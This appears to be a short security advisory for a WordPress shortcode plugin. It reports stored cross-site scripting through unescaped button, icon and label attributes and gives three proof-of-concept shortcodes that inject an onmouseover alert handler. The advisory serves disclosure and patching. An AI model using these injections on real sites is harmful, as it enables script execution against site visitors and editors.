The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which allows users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
Insert any of the following shortcodes in a page/post:
*Button shortcode
[lana_button size="md" type='" onmouseover="alert(1)" style="background:red;"']Lana Button[/lana_button]
*Icon shortcode
[lana_icon name='home" onmouseover="alert(1)" style="background:red;"']
*Label shortcode
[lana_label type='" onmouseover="alert(1)" style="background:red;"']New[/lana_label]